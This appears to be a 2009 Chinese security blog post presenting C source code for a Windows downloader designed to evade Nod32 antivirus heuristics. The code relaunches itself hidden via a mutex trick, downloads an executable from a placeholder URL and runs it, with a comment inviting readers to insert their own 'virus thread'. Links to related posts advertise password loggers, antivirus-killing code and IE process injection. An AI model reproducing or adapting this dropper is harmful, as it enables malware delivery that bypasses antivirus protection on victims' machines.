利用多线程反Nod32启发式侦查

首页 > 技术文章 > 利用多线程反Nod32启发式侦查

利用多线程反Nod32启发式侦查

2009年8月31日 Chinadu 发表评论 173 views 阅读评论

利用多线程反Nod32启发式侦查

代码如下：

/*--------------------------------------
/Author:GTR4[O.S.T]
/Email:502440115@qq.com
/Time:2009/8/29
/From: O Security Team
/Copyright (c) 2009 GTR4.
/
/Just for fun!
/Do it ,do our best!
*/--------------------------------------

int APIENTRY WinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nCmdShow)
{
char strAppName[] = "GTR4";
char strPath[MAX_PATH];
HANDLE hMutex = NULL;

//创建互斥对象
hMutex = CreateMutex(NULL, FALSE, strAppName);
if (hMutex != NULL)
{
if (GetLastError() == ERROR_ALREADY_EXISTS)
{

MessageBox(NULL,"Two","",0);
//病毒线程GW...... 自己发挥~
URLDownloadToFile(NULL,"http://.exe","C:\test.exe",0,NULL);
ShellExecute(0,"open","c:\test.exe",NULL,NULL,SW_SHOW);

}
else
{
MessageBox(NULL,"One","",0);
GetModuleFileName(GetModuleHandle(NULL), strPath, sizeof(strPath));
WinExec(strPath, SW_HIDE);
Sleep(1000);
ExitProcess(-1);

}
}

return 0;
}

2009年09月28日 -- WinPswLogger 源代码
2009年09月19日 -- 2个K掉360的代码
2009年09月8日 -- 内存扫描及编辑
2009年08月20日 -- “fatal error LNK1104: cannot open file “mfc42u.lib””问题解决
2009年08月15日 -- 最简单的下载者过NOD32 卡巴等启发[VC Delphi两个版本]
2009年08月11日 -- 简单的病毒扫描引擎
2009年08月10日 -- EXE自删除代码
2009年08月7日 -- 从内存中加载并启动一个exe(C++版)
2009年08月6日 -- 一个将自己代码插入IE进程的例子(VC代码)
2009年06月25日 -- Kill 360Safe 完整版（VC版）

分类: 技术文章标签: VC

评论 (0) Trackbacks (0) 发表评论 Trackback

本文目前尚无任何评论.

本文目前尚无任何 trackbacks 和 pingbacks.

Microsoft IIS 5.0/6.0 FTP Server Remote Stack Overflow Exploit (win2k) 赛门铁克发现窃听Skype的恶意软件

一	二	三	四	五	六	日
« 一
		1	2	3	4	5
6	7	8	9	10	11	12
13	14	15	16	17	18	19
20	21	22	23	24	25	26
27	28	29

Chinadu's Blog

利用多线程反Nod32启发式侦查

相关文章

About Me

站内搜索

日历

最新文章

热门文章

近期评论

文章归档

Categories

Blogroll

Archives